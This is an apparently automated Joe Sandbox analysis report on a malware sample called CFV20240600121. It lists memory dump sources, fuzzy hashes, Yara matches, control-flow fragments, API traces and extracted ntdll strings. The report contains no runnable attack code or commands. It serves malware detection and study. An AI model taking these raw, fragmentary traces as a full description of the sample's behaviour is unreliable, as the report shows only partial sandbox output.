                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50a97f26d82f5b02aea46495b308471cc5ae0d518e511a304f19fd1af1e865e8
                                        • Instruction ID: 2798f0f68247ba67d4628c03b583b7b7012370c1c135b96a3ff8b3ba496a6b7a
                                        • Opcode Fuzzy Hash: 50a97f26d82f5b02aea46495b308471cc5ae0d518e511a304f19fd1af1e865e8
                                        • Instruction Fuzzy Hash: B4C08CB25370D99E4B14CEE9C98048FBFBAEB81340F2468029802DA059E23549A1C6A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a24fd12c6f86a7486f2c2ac560e18f682f56bf5fdcc16a581e66d1974da8f3fe
                                        • Instruction ID: 8434789806cbe5b5e92615c128b5d6f33f988b37a2fc1bf0181bf480aa9e2b4b
                                        • Opcode Fuzzy Hash: a24fd12c6f86a7486f2c2ac560e18f682f56bf5fdcc16a581e66d1974da8f3fe
                                        • Instruction Fuzzy Hash: 5FA002F4C19245DBD7105F51D54C3BCBBB2EB29369F018055952691755CB7805889F01
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2977da278bdf989c8d1979be301a9d60e4c5eb68dfe7b835f13f216c4f8f3c74
                                        • Instruction ID: cba41db4dac0f139486f7a3e29ee0d9cd51f59234001ab123b1524c0351aaa49
                                        • Opcode Fuzzy Hash: 2977da278bdf989c8d1979be301a9d60e4c5eb68dfe7b835f13f216c4f8f3c74
                                        • Instruction Fuzzy Hash: 436106F4E1124ADFCB04CF99C4818AEFBB2FF4A350F14855AD415AB255D730A982CF96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0f3c67371c51434bfbb6a3b196dfe68f02285d0deef72d4d56561798baf0dd1
                                        • Instruction ID: 0e4ce78c72baa2e97f8c8d5836762e9b7c4d0eaa36b137eaa8932c71da03f7f3
                                        • Opcode Fuzzy Hash: f0f3c67371c51434bfbb6a3b196dfe68f02285d0deef72d4d56561798baf0dd1
                                        • Instruction Fuzzy Hash: 906127B0E11249DFCB04CFA6D5815EEFBB2BF89340F14941AD515B7214D738AA42CFA6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0470939dca4ed6912f790086e6628376f6e546724d76b7d634e8502c3193510f
                                        • Instruction ID: fc4868b242e1997ff0f5828467bcac43ea69d29a97caf07e4dcd3c3a55b6e490
                                        • Opcode Fuzzy Hash: 0470939dca4ed6912f790086e6628376f6e546724d76b7d634e8502c3193510f
                                        • Instruction Fuzzy Hash: 4841F7B0E1520A9FCB44CFAAC4815EEFBF2EF89350F14C06AC515A7254E734AA41CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c5ccef6f509a9db34ab2032ffe4332c89e0e56d55a623d2e4db55d067e6465a
                                        • Instruction ID: dec5d46cde9e134cac3b19a315a82866193672addf8fb89828d105f0ef5cb855
                                        • Opcode Fuzzy Hash: 3c5ccef6f509a9db34ab2032ffe4332c89e0e56d55a623d2e4db55d067e6465a
                                        • Instruction Fuzzy Hash: FF41F8B0E1520A9FCB44CFAAC4815EEFBF2EF89350F14D06AC515A7254E734AA51CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 983736807d74e0016dac1c149c932b6f89f7b8d6a0f6e6999ab0e77e80e8d158
                                        • Instruction ID: 1fecf868acece1a0f331351f0722ef2d336d8a935c7058f05feff37dba9f6dad
                                        • Opcode Fuzzy Hash: 983736807d74e0016dac1c149c932b6f89f7b8d6a0f6e6999ab0e77e80e8d158
                                        • Instruction Fuzzy Hash: CE41F4B0E1560ADBCB44CFAAC5815EEFBF2EF89240F24C46AC505A7254D734AA41CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5bee9506d285572781b473f2dc5d06c937377fdcbee6f6a7d73ac5880ed0e0c8
                                        • Instruction ID: 85c2b85b0eeea6d6457ede54c4361c2df5f7a428caddc3ba2553be96abac158d
                                        • Opcode Fuzzy Hash: 5bee9506d285572781b473f2dc5d06c937377fdcbee6f6a7d73ac5880ed0e0c8
                                        • Instruction Fuzzy Hash: A441E3B0E1560ACBDB48CFAAC5815EEFBF2FF89250F24C46AC505B7214D734AA418F91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4c35726c925f6a5c55c3604432d755305b64a59d37b73bdfd123ef7f5ab117c
                                        • Instruction ID: fd0ee85f0a6b9653ae42455e30ac68fbbe3c59a9e7b8f195e081ba3b14d823e0
                                        • Opcode Fuzzy Hash: e4c35726c925f6a5c55c3604432d755305b64a59d37b73bdfd123ef7f5ab117c
                                        • Instruction Fuzzy Hash: 912113B1E112199BDB08CFAAD9416EEFBF7AFC8310F14C13AD418B7254EB345A018B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63401f445c47d64a8f45d651419fbceb99821cfcfb2ceee5d97b57e949a5e7c6
                                        • Instruction ID: faf2c70cad59a06ad3fb4618b4f2a91af27ad39618d4c35ff8bcf3738ea1e378
                                        • Opcode Fuzzy Hash: 63401f445c47d64a8f45d651419fbceb99821cfcfb2ceee5d97b57e949a5e7c6
                                        • Instruction Fuzzy Hash: EBC04C67D9E004F685284DC571090F8BB3CD78F1A3F023055D15EA7052876291664554

                                        Execution Graph

                                        Execution Coverage:1.1%
                                        Dynamic/Decrypted Code Coverage:4.7%
                                        Signature Coverage:7.4%
                                        Total number of Nodes:148
                                        Total number of Limit Nodes:14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 60 417633-41764f 61 417657-41765c 60->61 62 417652 call 42db63 60->62 63 417662-417670 call 42e083 61->63 64 41765e-417661 61->64 62->61 67 417680-417691 call 42c523 63->67 68 417672-41767d call 42e323 63->68 73 417693-4176a7 LdrLoadDll 67->73 74 4176aa-4176ad 67->74 68->67 73->74
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176A5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 80 42afb3-42afef call 4047f3 call 42c043 NtClose
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 94 1412b60-1412b6c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 96 1412df0-1412dfc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 95 1412c70-1412c7c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 97 14135c0-14135cc LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: _R39449$_R39449
                                        • API String ID: 0-3332756889

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 18 413c7b-413c95 19 413c9d-413cea call 42d913 call 417633 call 404763 call 424283 18->19 20 413c98 call 42cf03 18->20 29 413d0a-413d10 19->29 30 413cec-413cfb PostThreadMessageW 19->30 20->19 30->29 31 413cfd-413d07 30->31 31->29
                                        APIs
                                        • PostThreadMessageW.USER32(_R39449,00000111,00000000,00000000), ref: 00413CF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: _R39449$_R39449
                                        • API String ID: 1836367815-3332756889

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 32 413c83-413c95 33 413c9d-413cea call 42d913 call 417633 call 404763 call 424283 32->33 34 413c98 call 42cf03 32->34 43 413d0a-413d10 33->43 44 413cec-413cfb PostThreadMessageW 33->44 34->33 44->43 45 413cfd-413d07 44->45 45->43
                                        APIs
                                        • PostThreadMessageW.USER32(_R39449,00000111,00000000,00000000), ref: 00413CF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID: _R39449$_R39449
                                        • API String ID: 1836367815-3332756889

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 55 42b313-42b354 call 4047f3 call 42c043 RtlFreeHeap
                                        APIs
                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B34F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeHeap
                                        • String ID: cA
                                        • API String ID: 3298025750-2872761854

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 75 42b2c3-42b304 call 4047f3 call 42c043 RtlAllocateHeap
                                        APIs
                                        • RtlAllocateHeap.NTDLL(?,0041DDB5,?,?,00000000,?,0041DDB5,?,?,?), ref: 0042B2FF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:

                                        Control-flow Graph

                                        control_flow_graph 85 42b363-42b39c call 4047f3 call 42c043 ExitProcess
                                        APIs
                                        • ExitProcess.KERNEL32(?,00000000,?,?,3AF16345,?,?,3AF16345), ref: 0042B397
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_400000_CFV20240600121.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID:

                                        Control-flow Graph

                                        control_flow_graph 90 1412c0a-1412c0f 91 1412c11-1412c18 90->91 92 1412c1f-1412c26 LdrInitializeThunk 90->92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                        Strings
                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014454CE
                                        • Invalid debug info address of this critical section, xrefs: 014454B6
                                        • Critical section address, xrefs: 01445425, 014454BC, 01445534
                                        • Address of the debug info found in the active list., xrefs: 014454AE, 014454FA
                                        • Critical section address., xrefs: 01445502
                                        • Critical section debug info address, xrefs: 0144541F, 0144552E
                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0144540A, 01445496, 01445519
                                        • Thread identifier, xrefs: 0144553A
                                        • 8, xrefs: 014452E3
                                        • corrupted critical section, xrefs: 014454C2
                                        • double initialized or corrupted critical section, xrefs: 01445508
                                        • undeleted critical section in freed memory, xrefs: 0144542B
                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01445543
                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014454E2
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                        Strings
                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014422E4
                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01442412
                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01442624
                                        • @, xrefs: 0144259B
                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01442506
                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01442498
                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014425EB
                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0144261F
                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01442602
                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01442409
                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014424C0
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                        Strings
                                        • AVRF: -*- final list of providers -*- , xrefs: 01458B8F
                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01458A67
                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01458A3D
                                        • HandleTraces, xrefs: 01458C8F
                                        • VerifierDlls, xrefs: 01458CBD
                                        • VerifierDebug, xrefs: 01458CA5
                                        • VerifierFlags, xrefs: 01458C50
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                        Strings
                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01429A01
                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01429A2A
                                        • apphelp.dll, xrefs: 013C6496
                                        • LdrpInitShimEngine, xrefs: 014299F4, 01429A07, 01429A30
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01429A11, 01429A3A
                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014299ED
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        Strings
                                        • RtlGetAssemblyStorageRoot, xrefs: 01442160, 0144219A, 014421BA
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014421BF
                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01442180
                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01442178
                                        • SXS: %s() passed the empty activation context, xrefs: 01442165
                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0144219F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                        Strings
                                        • LdrpInitializeImportRedirection, xrefs: 01448177, 014481EB
                                        • Loading import redirection DLL: '%wZ', xrefs: 01448170
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01448181, 014481F5
                                        • LdrpInitializeProcess, xrefs: 0140C6C4
                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 014481E5
                                        • minkernel\ntdll\ldrinit.c, xrefs: 0140C6C3
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                        APIs
                                          • Part of subcall function 01412DF0: LdrInitializeThunk.NTDLL ref: 01412DFA
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410BA3
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410BB6
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410D60
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01410D74
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                        • String ID:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                        Strings
                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0140855E
                                        • LdrpInitializeProcess, xrefs: 01408422
                                        • minkernel\ntdll\ldrinit.c, xrefs: 01408421
                                        • @, xrefs: 01408591
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                        Strings
                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014421D9, 014422B1
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014422B6
                                        • .Local, xrefs: 014028D8
                                        • SXS: %s() passed the empty activation context, xrefs: 014421DE
